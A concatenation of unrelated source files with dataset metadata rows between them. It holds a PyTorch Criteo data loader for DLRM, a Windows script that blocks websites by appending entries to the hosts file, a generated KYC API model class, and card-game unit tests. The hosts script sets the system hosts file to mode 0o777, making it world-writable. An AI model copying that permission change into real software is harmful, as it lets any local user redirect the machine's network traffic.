categorical_features = torch.cat(categorical_features, dim=1)
else:
categorical_features = None
return click, numerical_features, categorical_features
def __getitem__(self, idx):
if self.prefetch_depth <= 1:
return self.getitem(idx)
if idx == 0:
# Prefetch triggers MLperf timer. So start prefetch on first iter instead of in constructor.
for i in range(self.prefetch_depth):
self.prefetch_queue.put(self.executor.submit(self.getitem, (i)))
if idx < self.num_batches - self.prefetch_depth:
self.prefetch_queue.put(self.executor.submit(self.getitem, (idx + self.prefetch_depth)))
return self.prefetch_queue.get().result()
def __del__(self):
os.close(self.label_file)
if self.numerical_features_file is not None:
os.close(self.numerical_features_file)
if self.categorical_features_files is not None:
for cat_file in self.categorical_features_files:
os.close(cat_file)
def data_collate_fn(batch_data, device="cuda", orig_stream=None):
"""Split raw batch data to features and labels
Args:
batch_data (Tensor): One batch of data from CriteoBinDataset.
device (torch.device): Output device. If device is GPU, split data on GPU is much faster.
orig_stream (torch.cuda.Stream): CUDA stream that data processing will be run in.
Returns:
numerical_features (Tensor):
categorical_features (Tensor):
click (Tensor):
"""
if not isinstance(batch_data, torch.Tensor):
# Distributed pass
if batch_data[1] is not None:
numerical_features = torch.log(batch_data[1].to(device, non_blocking=True) + 1.).squeeze()
else:
# There are codes rely on numerical_features' dtype
numerical_features = torch.empty(batch_data[0].shape[0], 13, dtype=torch.float32, device=device)
if batch_data[2] is not None:
categorical_features = batch_data[2].to(device, non_blocking=True)
else:
categorical_features = None
click = batch_data[0].to(device, non_blocking=True).squeeze()
else:
batch_data = batch_data.to(device, non_blocking=True).split([1, 13, 26], dim=1)
numerical_features = torch.log(batch_data[1].to(torch.float32) + 1.).squeeze()
categorical_features = batch_data[2].to(torch.long)
click = batch_data[0].to(torch.float32).squeeze()
# record_stream() prevents data being unintentionally reused. Aslo NOTE that it may not work
# with num_works >=1 in the DataLoader when use this data_collate_fn() as collate function.
if orig_stream is not None:
numerical_features.record_stream(orig_stream)
if categorical_features is not None:
categorical_features.record_stream(orig_stream)
click.record_stream(orig_stream)
return numerical_features, categorical_features, click
def prefetcher(load_iterator, prefetch_stream):
def _prefetch():
with torch.cuda.stream(prefetch_stream):
try:
data_batch = next(load_iterator)
except StopIteration:
return None
return data_batch
next_data_batch = _prefetch()
while next_data_batch is not None:
torch.cuda.current_stream().wait_stream(prefetch_stream)
data_batch = next_data_batch
next_data_batch = _prefetch()
yield data_batch
| 40.326761
| 119
| 0.656538
|
import concurrent
import functools
import math
import os
import queue
import numpy as np
from dlrm import mlperf_logger
import torch
from torch.utils.data import Dataset
from dlrm.utils import distributed as dist
def get_data_loader(dataset_path,
batch_size,
test_batch_size,
return_device="cuda",
dataset_type="bin",
num_workers=0,
shuffle=False,
**kwargs):
train_dataset_bin = os.path.join(dataset_path, "train_data.bin")
test_dataset_bin = os.path.join(dataset_path, "test_data.bin")
if dataset_type == 'bin':
dataset_train = CriteoBinDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoBinDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'memmap':
dataset_train = CriteoMemmapDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoMemmapDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'dist':
dataset_train = DistCriteoDataset(
os.path.join(dataset_path, "train"), batch_size=batch_size, shuffle=shuffle, **kwargs)
if hasattr(dataset_train, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.TRAIN_SAMPLES,
value=dataset_train.num_samples)
dataset_test = DistCriteoDataset(
os.path.join(dataset_path, "test"), batch_size=test_batch_size, **kwargs)
if hasattr(dataset_test, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.EVAL_SAMPLES,
value=dataset_test.num_samples)
data_loader_args = dict(
batch_size=None,
num_workers=num_workers,
pin_memory=False,
collate_fn=functools.partial(data_collate_fn, device=return_device, orig_stream=torch.cuda.current_stream()))
data_loader_train = torch.utils.data.DataLoader(dataset_train, **data_loader_args)
data_loader_test = torch.utils.data.DataLoader(dataset_test, **data_loader_args)
return data_loader_train, data_loader_test
def _dist_permutation(size):
if dist.get_world_size() > 1:
permutation_file = "/tmp/permutation.npy"
if dist.get_local_rank() == 0:
np.save(permutation_file, np.random.permutation(size))
torch.distributed.barrier()
permutation = np.load(permutation_file)
else:
permutation = np.random.permutation(size)
return permutation
class CriteoBinDataset(Dataset):
def __init__(self, data_file, batch_size=1, bytes_per_feature=4, shuffle=False):
self.tad_fea = 1 + 13
self.tot_fea = 1 + 13 + 26
self.batch_size = batch_size
self.bytes_per_batch = (bytes_per_feature * self.tot_fea * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / self.bytes_per_batch)
print('data file:', data_file, 'number of batches:', self.num_batches)
self.file = open(data_file, 'rb', buffering=0)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
self.file.seek(idx * self.bytes_per_batch, 0)
raw_data = self.file.read(self.bytes_per_batch)
array = np.frombuffer(raw_data, dtype=np.int32)
tensor = torch.from_numpy(array).view((-1, self.tot_fea))
return tensor
def __del__(self):
self.file.close()
class CriteoMemmapDataset(Dataset):
def __init__(self, data_file, batch_size, bytes_per_feature=4, shuffle=False):
self.record_width = 40
self.batch_size = batch_size
bytes_per_batch = (bytes_per_feature * self.record_width * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / bytes_per_batch)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.mmap = np.memmap(data_file, dtype=np.int32, mode='r')
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
start_idx = idx * (self.batch_size * self.record_width)
end_idx = min((idx + 1) * (self.batch_size * self.record_width), self.mmap.shape[0])
array = self.mmap[start_idx:end_idx]
tensor = torch.from_numpy(array).reshape(-1, self.record_width)
return tensor
class DistCriteoDataset(Dataset):
def __init__(self, data_path, batch_size=1, shuffle=False, numerical_features=False, categorical_features=None,
prefetch_depth=10):
bytes_per_label = 4
self.bytes_per_batch = {
"label": bytes_per_label * batch_size,
"numerical": 13 * 4 * batch_size if numerical_features else 0,
"categorical": 4 * batch_size if categorical_features is not None else 0
}
self.batch_size = batch_size
self.label_file = os.open(os.path.join(data_path, F"label.bin"), os.O_RDONLY)
label_file_size = os.fstat(self.label_file).st_size
self.num_samples = int(label_file_size / bytes_per_label)
self.num_batches = math.ceil(label_file_size / self.bytes_per_batch["label"])
if numerical_features:
self.numerical_features_file = os.open(os.path.join(data_path, "numerical.bin"), os.O_RDONLY)
if math.ceil(os.fstat(self.numerical_features_file).st_size /
self.bytes_per_batch["numerical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
else:
self.numerical_features_file = None
if categorical_features is not None and categorical_features:
self.categorical_features_files = []
for cat_id in categorical_features:
cat_file = os.open(os.path.join(data_path, F"cat_{cat_id}.bin"), os.O_RDONLY)
if math.ceil(
os.fstat(cat_file).st_size / self.bytes_per_batch["categorical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
self.categorical_features_files.append(cat_file)
else:
self.categorical_features_files = None
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.prefetch_depth = min(prefetch_depth, self.num_batches)
self.prefetch_queue = queue.Queue()
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=1)
def __len__(self):
return self.num_batches
def getitem(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
raw_label_data = os.pread(
self.label_file, self.bytes_per_batch["label"], idx * self.bytes_per_batch["label"])
click = torch.from_numpy(np.frombuffer(raw_label_data, dtype=np.float32))
if self.numerical_features_file is not None:
raw_numerical_data = os.pread(
self.numerical_features_file,
self.bytes_per_batch["numerical"],
idx * self.bytes_per_batch["numerical"])
numerical_features = torch.from_numpy(np.frombuffer(raw_numerical_data,
dtype=np.float32)).view(-1, 13)
else:
numerical_features = None
if self.categorical_features_files is not None:
categorical_features = []
for cat_file in self.categorical_features_files:
raw_cat_data = os.pread(
cat_file,
self.bytes_per_batch["categorical"],
idx * self.bytes_per_batch["categorical"])
categorical_features.append(torch.from_numpy(np.frombuffer(raw_cat_data, dtype=np.int32)).unsqueeze(1))
categorical_features = torch.cat(categorical_features, dim=1)
else:
categorical_features = None
return click, numerical_features, categorical_features
def __getitem__(self, idx):
if self.prefetch_depth <= 1:
return self.getitem(idx)
if idx == 0:
for i in range(self.prefetch_depth):
self.prefetch_queue.put(self.executor.submit(self.getitem, (i)))
if idx < self.num_batches - self.prefetch_depth:
self.prefetch_queue.put(self.executor.submit(self.getitem, (idx + self.prefetch_depth)))
return self.prefetch_queue.get().result()
def __del__(self):
os.close(self.label_file)
if self.numerical_features_file is not None:
os.close(self.numerical_features_file)
if self.categorical_features_files is not None:
for cat_file in self.categorical_features_files:
os.close(cat_file)
def data_collate_fn(batch_data, device="cuda", orig_stream=None):
if not isinstance(batch_data, torch.Tensor):
if batch_data[1] is not None:
numerical_features = torch.log(batch_data[1].to(device, non_blocking=True) + 1.).squeeze()
else:
numerical_features = torch.empty(batch_data[0].shape[0], 13, dtype=torch.float32, device=device)
if batch_data[2] is not None:
categorical_features = batch_data[2].to(device, non_blocking=True)
else:
categorical_features = None
click = batch_data[0].to(device, non_blocking=True).squeeze()
else:
batch_data = batch_data.to(device, non_blocking=True).split([1, 13, 26], dim=1)
numerical_features = torch.log(batch_data[1].to(torch.float32) + 1.).squeeze()
categorical_features = batch_data[2].to(torch.long)
click = batch_data[0].to(torch.float32).squeeze()
# record_stream() prevents data being unintentionally reused. Aslo NOTE that it may not work
# with num_works >=1 in the DataLoader when use this data_collate_fn() as collate function.
if orig_stream is not None:
numerical_features.record_stream(orig_stream)
if categorical_features is not None:
categorical_features.record_stream(orig_stream)
click.record_stream(orig_stream)
return numerical_features, categorical_features, click
def prefetcher(load_iterator, prefetch_stream):
def _prefetch():
with torch.cuda.stream(prefetch_stream):
try:
data_batch = next(load_iterator)
except StopIteration:
return None
return data_batch
next_data_batch = _prefetch()
while next_data_batch is not None:
torch.cuda.current_stream().wait_stream(prefetch_stream)
data_batch = next_data_batch
next_data_batch = _prefetch()
yield data_batch
| true
| true
|
1c420781d029b750bab07902b9e11705fcd9a9da
| 1,654
|
py
|
Python
|
main.py
|
iFly350x/Parental-Control-Website-Blockage-
|
fdf30f35d8a7cea0634dd7a1f7b20b05877d249a
|
[
"BSL-1.0"
] | null | null | null |
main.py
|
iFly350x/Parental-Control-Website-Blockage-
|
fdf30f35d8a7cea0634dd7a1f7b20b05877d249a
|
[
"BSL-1.0"
] | null | null | null |
main.py
|
iFly350x/Parental-Control-Website-Blockage-
|
fdf30f35d8a7cea0634dd7a1f7b20b05877d249a
|
[
"BSL-1.0"
] | null | null | null |
import os
from pathlib import Path
import sys
from typing import *
import ipaddress
class sitesControl:
FILE_PATH = Path('C:\Windows\System32\drivers\etc')
def __init__(self) -> None:
self.path = self.FILE_PATH
self.websites = websites = []
self.size = None
self.ip = ipaddress.ip_address('127.0.0.1')
def checkos(self) -> None:
if not sys.platform.startswith('win'):
raise SystemExit("Only Windows Is Supported!")
def changePath(self) -> None:
os.chdir(self.path)
def changePerms(self) -> None:
os.chmod("hosts", 0o777)
def getinp(self) -> None:
while True:
try:
self.size = int(input('Enter Number Of Sites To block: '))
break
except:
print("invalid input please enter a number")
for _ in range(self.size):
website = input("Enter Wbsites: ").replace(" ", "").rstrip("/")
self.websites.append(website)
def addingList(self) -> None:
with open('hosts', 'a') as f:
for _ in range(self.size):
for i in self.websites:
f.write("\n{} {}".format(self.ip, i))
def verification(self) -> None:
for i in self.websites:
print("Wesbsite {} Has Been Blocked. Please Refresh Your Browser.".format(i))
def main() -> None:
control = sitesControl()
control.checkos()
control.changePath()
control.changePerms()
control.getinp()
control.addingList()
control.verification()
if __name__ == '__main__':
main()
| 25.84375
| 89
| 0.561064
|
import os
from pathlib import Path
import sys
from typing import *
import ipaddress
class sitesControl:
FILE_PATH = Path('C:\Windows\System32\drivers\etc')
def __init__(self) -> None:
self.path = self.FILE_PATH
self.websites = websites = []
self.size = None
self.ip = ipaddress.ip_address('127.0.0.1')
def checkos(self) -> None:
if not sys.platform.startswith('win'):
raise SystemExit("Only Windows Is Supported!")
def changePath(self) -> None:
os.chdir(self.path)
def changePerms(self) -> None:
os.chmod("hosts", 0o777)
def getinp(self) -> None:
while True:
try:
self.size = int(input('Enter Number Of Sites To block: '))
break
except:
print("invalid input please enter a number")
for _ in range(self.size):
website = input("Enter Wbsites: ").replace(" ", "").rstrip("/")
self.websites.append(website)
def addingList(self) -> None:
with open('hosts', 'a') as f:
for _ in range(self.size):
for i in self.websites:
f.write("\n{} {}".format(self.ip, i))
def verification(self) -> None:
for i in self.websites:
print("Wesbsite {} Has Been Blocked. Please Refresh Your Browser.".format(i))
def main() -> None:
control = sitesControl()
control.checkos()
control.changePath()
control.changePerms()
control.getinp()
control.addingList()
control.verification()
if __name__ == '__main__':
main()
| true
| true
|
1c420894852746a91a8d8ed2518ead17557c43f2
| 11,264
|
py
|
Python
|
integration/python/integration_api/models/kyc_response_vo.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
integration/python/integration_api/models/kyc_response_vo.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
integration/python/integration_api/models/kyc_response_vo.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Integration API
The Hydrogen Integration API # noqa: E501
OpenAPI spec version: 1.3.1
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from integration_api.configuration import Configuration
class KycResponseVo(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'create_date': 'datetime',
'kyc_status': 'str',
'kyc_type': 'str',
'nucleus_business_id': 'str',
'nucleus_client_id': 'str',
'nucleus_document_id': 'str',
'product': 'str',
'update_date': 'datetime',
'vendor_name': 'str',
'vendor_request_data': 'KycVendorRequestDataVO',
'vendor_response': 'object'
}
attribute_map = {
'create_date': 'create_date',
'kyc_status': 'kyc_status',
'kyc_type': 'kyc_type',
'nucleus_business_id': 'nucleus_business_id',
'nucleus_client_id': 'nucleus_client_id',
'nucleus_document_id': 'nucleus_document_id',
'product': 'product',
'update_date': 'update_date',
'vendor_name': 'vendor_name',
'vendor_request_data': 'vendor_request_data',
'vendor_response': 'vendor_response'
}
def __init__(self, create_date=None, kyc_status=None, kyc_type=None, nucleus_business_id=None, nucleus_client_id=None, nucleus_document_id=None, product=None, update_date=None, vendor_name=None, vendor_request_data=None, vendor_response=None, _configuration=None): # noqa: E501
"""KycResponseVo - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._create_date = None
self._kyc_status = None
self._kyc_type = None
self._nucleus_business_id = None
self._nucleus_client_id = None
self._nucleus_document_id = None
self._product = None
self._update_date = None
self._vendor_name = None
self._vendor_request_data = None
self._vendor_response = None
self.discriminator = None
if create_date is not None:
self.create_date = create_date
if kyc_status is not None:
self.kyc_status = kyc_status
if kyc_type is not None:
self.kyc_type = kyc_type
if nucleus_business_id is not None:
self.nucleus_business_id = nucleus_business_id
if nucleus_client_id is not None:
self.nucleus_client_id = nucleus_client_id
if nucleus_document_id is not None:
self.nucleus_document_id = nucleus_document_id
if product is not None:
self.product = product
if update_date is not None:
self.update_date = update_date
if vendor_name is not None:
self.vendor_name = vendor_name
if vendor_request_data is not None:
self.vendor_request_data = vendor_request_data
if vendor_response is not None:
self.vendor_response = vendor_response
@property
def create_date(self):
"""Gets the create_date of this KycResponseVo. # noqa: E501
:return: The create_date of this KycResponseVo. # noqa: E501
:rtype: datetime
"""
return self._create_date
@create_date.setter
def create_date(self, create_date):
"""Sets the create_date of this KycResponseVo.
:param create_date: The create_date of this KycResponseVo. # noqa: E501
:type: datetime
"""
self._create_date = create_date
@property
def kyc_status(self):
"""Gets the kyc_status of this KycResponseVo. # noqa: E501
:return: The kyc_status of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._kyc_status
@kyc_status.setter
def kyc_status(self, kyc_status):
"""Sets the kyc_status of this KycResponseVo.
:param kyc_status: The kyc_status of this KycResponseVo. # noqa: E501
:type: str
"""
self._kyc_status = kyc_status
@property
def kyc_type(self):
"""Gets the kyc_type of this KycResponseVo. # noqa: E501
:return: The kyc_type of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._kyc_type
@kyc_type.setter
def kyc_type(self, kyc_type):
"""Sets the kyc_type of this KycResponseVo.
:param kyc_type: The kyc_type of this KycResponseVo. # noqa: E501
:type: str
"""
self._kyc_type = kyc_type
@property
def nucleus_business_id(self):
"""Gets the nucleus_business_id of this KycResponseVo. # noqa: E501
:return: The nucleus_business_id of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._nucleus_business_id
@nucleus_business_id.setter
def nucleus_business_id(self, nucleus_business_id):
"""Sets the nucleus_business_id of this KycResponseVo.
:param nucleus_business_id: The nucleus_business_id of this KycResponseVo. # noqa: E501
:type: str
"""
self._nucleus_business_id = nucleus_business_id
@property
def nucleus_client_id(self):
"""Gets the nucleus_client_id of this KycResponseVo. # noqa: E501
:return: The nucleus_client_id of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._nucleus_client_id
@nucleus_client_id.setter
def nucleus_client_id(self, nucleus_client_id):
"""Sets the nucleus_client_id of this KycResponseVo.
:param nucleus_client_id: The nucleus_client_id of this KycResponseVo. # noqa: E501
:type: str
"""
self._nucleus_client_id = nucleus_client_id
@property
def nucleus_document_id(self):
"""Gets the nucleus_document_id of this KycResponseVo. # noqa: E501
:return: The nucleus_document_id of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._nucleus_document_id
@nucleus_document_id.setter
def nucleus_document_id(self, nucleus_document_id):
"""Sets the nucleus_document_id of this KycResponseVo.
:param nucleus_document_id: The nucleus_document_id of this KycResponseVo. # noqa: E501
:type: str
"""
self._nucleus_document_id = nucleus_document_id
@property
def product(self):
"""Gets the product of this KycResponseVo. # noqa: E501
:return: The product of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._product
@product.setter
def product(self, product):
"""Sets the product of this KycResponseVo.
:param product: The product of this KycResponseVo. # noqa: E501
:type: str
"""
self._product = product
@property
def update_date(self):
"""Gets the update_date of this KycResponseVo. # noqa: E501
:return: The update_date of this KycResponseVo. # noqa: E501
:rtype: datetime
"""
return self._update_date
@update_date.setter
def update_date(self, update_date):
"""Sets the update_date of this KycResponseVo.
:param update_date: The update_date of this KycResponseVo. # noqa: E501
:type: datetime
"""
self._update_date = update_date
@property
def vendor_name(self):
"""Gets the vendor_name of this KycResponseVo. # noqa: E501
:return: The vendor_name of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._vendor_name
@vendor_name.setter
def vendor_name(self, vendor_name):
"""Sets the vendor_name of this KycResponseVo.
:param vendor_name: The vendor_name of this KycResponseVo. # noqa: E501
:type: str
"""
self._vendor_name = vendor_name
@property
def vendor_request_data(self):
"""Gets the vendor_request_data of this KycResponseVo. # noqa: E501
:return: The vendor_request_data of this KycResponseVo. # noqa: E501
:rtype: KycVendorRequestDataVO
"""
return self._vendor_request_data
@vendor_request_data.setter
def vendor_request_data(self, vendor_request_data):
"""Sets the vendor_request_data of this KycResponseVo.
:param vendor_request_data: The vendor_request_data of this KycResponseVo. # noqa: E501
:type: KycVendorRequestDataVO
"""
self._vendor_request_data = vendor_request_data
@property
def vendor_response(self):
"""Gets the vendor_response of this KycResponseVo. # noqa: E501
:return: The vendor_response of this KycResponseVo. # noqa: E501
:rtype: object
"""
return self._vendor_response
@vendor_response.setter
def vendor_response(self, vendor_response):
"""Sets the vendor_response of this KycResponseVo.
:param vendor_response: The vendor_response of this KycResponseVo. # noqa: E501
:type: object
"""
self._vendor_response = vendor_response
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(KycResponseVo, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, KycResponseVo):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, KycResponseVo):
return True
return self.to_dict() != other.to_dict()
| 29.333333
| 282
| 0.621893
|
import pprint
import re
import six
from integration_api.configuration import Configuration
class KycResponseVo(object):
swagger_types = {
'create_date': 'datetime',
'kyc_status': 'str',
'kyc_type': 'str',
'nucleus_business_id': 'str',
'nucleus_client_id': 'str',
'nucleus_document_id': 'str',
'product': 'str',
'update_date': 'datetime',
'vendor_name': 'str',
'vendor_request_data': 'KycVendorRequestDataVO',
'vendor_response': 'object'
}
attribute_map = {
'create_date': 'create_date',
'kyc_status': 'kyc_status',
'kyc_type': 'kyc_type',
'nucleus_business_id': 'nucleus_business_id',
'nucleus_client_id': 'nucleus_client_id',
'nucleus_document_id': 'nucleus_document_id',
'product': 'product',
'update_date': 'update_date',
'vendor_name': 'vendor_name',
'vendor_request_data': 'vendor_request_data',
'vendor_response': 'vendor_response'
}
def __init__(self, create_date=None, kyc_status=None, kyc_type=None, nucleus_business_id=None, nucleus_client_id=None, nucleus_document_id=None, product=None, update_date=None, vendor_name=None, vendor_request_data=None, vendor_response=None, _configuration=None):
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._create_date = None
self._kyc_status = None
self._kyc_type = None
self._nucleus_business_id = None
self._nucleus_client_id = None
self._nucleus_document_id = None
self._product = None
self._update_date = None
self._vendor_name = None
self._vendor_request_data = None
self._vendor_response = None
self.discriminator = None
if create_date is not None:
self.create_date = create_date
if kyc_status is not None:
self.kyc_status = kyc_status
if kyc_type is not None:
self.kyc_type = kyc_type
if nucleus_business_id is not None:
self.nucleus_business_id = nucleus_business_id
if nucleus_client_id is not None:
self.nucleus_client_id = nucleus_client_id
if nucleus_document_id is not None:
self.nucleus_document_id = nucleus_document_id
if product is not None:
self.product = product
if update_date is not None:
self.update_date = update_date
if vendor_name is not None:
self.vendor_name = vendor_name
if vendor_request_data is not None:
self.vendor_request_data = vendor_request_data
if vendor_response is not None:
self.vendor_response = vendor_response
@property
def create_date(self):
return self._create_date
@create_date.setter
def create_date(self, create_date):
self._create_date = create_date
@property
def kyc_status(self):
return self._kyc_status
@kyc_status.setter
def kyc_status(self, kyc_status):
self._kyc_status = kyc_status
@property
def kyc_type(self):
return self._kyc_type
@kyc_type.setter
def kyc_type(self, kyc_type):
self._kyc_type = kyc_type
@property
def nucleus_business_id(self):
return self._nucleus_business_id
@nucleus_business_id.setter
def nucleus_business_id(self, nucleus_business_id):
self._nucleus_business_id = nucleus_business_id
@property
def nucleus_client_id(self):
return self._nucleus_client_id
@nucleus_client_id.setter
def nucleus_client_id(self, nucleus_client_id):
self._nucleus_client_id = nucleus_client_id
@property
def nucleus_document_id(self):
return self._nucleus_document_id
@nucleus_document_id.setter
def nucleus_document_id(self, nucleus_document_id):
self._nucleus_document_id = nucleus_document_id
@property
def product(self):
return self._product
@product.setter
def product(self, product):
self._product = product
@property
def update_date(self):
return self._update_date
@update_date.setter
def update_date(self, update_date):
self._update_date = update_date
@property
def vendor_name(self):
return self._vendor_name
@vendor_name.setter
def vendor_name(self, vendor_name):
self._vendor_name = vendor_name
@property
def vendor_request_data(self):
return self._vendor_request_data
@vendor_request_data.setter
def vendor_request_data(self, vendor_request_data):
self._vendor_request_data = vendor_request_data
@property
def vendor_response(self):
return self._vendor_response
@vendor_response.setter
def vendor_response(self, vendor_response):
self._vendor_response = vendor_response
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(KycResponseVo, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, KycResponseVo):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
if not isinstance(other, KycResponseVo):
return True
return self.to_dict() != other.to_dict()
| true
| true
|
1c4208b2f7a2bd869e15e83d2bdd272601022302
| 29,953
|
py
|
Python
|
testsSDW__copy/card_tests/shaman_tests.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
testsSDW__copy/card_tests/shaman_tests.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
testsSDW__copy/card_tests/shaman_tests.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
import random
import unittest
from SDWLE.cards.spells.neutral import TheCoin
from testsSDW.agents.testing_agents import OneCardPlayingAgent, MinionAttackingAgent, CardTestingAgent, \
PlayAndAttackAgent
from testsSDW.testing_utils import generate_game_for
from SDWLE.cards import *
from SDWLE.constants import MINION_TYPE
from SDWLE.agents.basic_agents import PredictableAgent, DoNothingAgent
class TestShaman(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_AlAkirTheWindlord(self):
game = generate_game_for(AlAkirTheWindlord, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 15):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Al'Akir the Windlord", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertTrue(game.players[0].minions[0].charge())
self.assertTrue(game.players[0].minions[0].divine_shield)
self.assertTrue(game.players[0].minions[0].taunt)
def test_DustDevil(self):
game = generate_game_for(DustDevil, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Dust Devil", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertEqual(2, game.players[0].upcoming_overload)
game.play_single_turn()
# Overload should cause that we start this turn with 0 mana
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(0, game.players[0].upcoming_overload)
self.assertEqual(0, game.players[0].mana)
self.assertEqual(2, game.players[0].max_mana)
def test_EarthElemental(self):
game = generate_game_for(EarthElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
# Earth Elemental should be played
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Earth Elemental", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(3, game.players[0].upcoming_overload)
def test_FireElemental(self):
game = generate_game_for(FireElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
# Fire Elemental should be played, and its battlecry dealing three damage to opponent
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Fire Elemental", game.players[0].minions[0].card.name)
self.assertEqual(27, game.players[1].hero.health)
def test_FlametongueTotem(self):
game = generate_game_for(StonetuskBoar, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
# There should be three Stonetusk Boars on the board
self.assertEqual(3, len(game.players[0].minions))
# add a new Flametongue Totem at index 1
totem = FlametongueTotem()
totem.summon(game.players[0], game, 1)
# The minions to either side should have their attack increased
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# When removing the minion at index 0, we should not get an error
game.players[0].minions[0].die(None)
game.players[0].minions[0].activate_delayed()
self.assertEqual(3, len(game.players[0].minions))
# When removing the minion at index 1, we should have a new minion at index 1,
# and its attack should be increased
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# Silencing this minion should have no effect on its attack
game.players[0].minions[1].silence()
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# We should be able to add a boar on either side of the wolf, and their attack should be increased
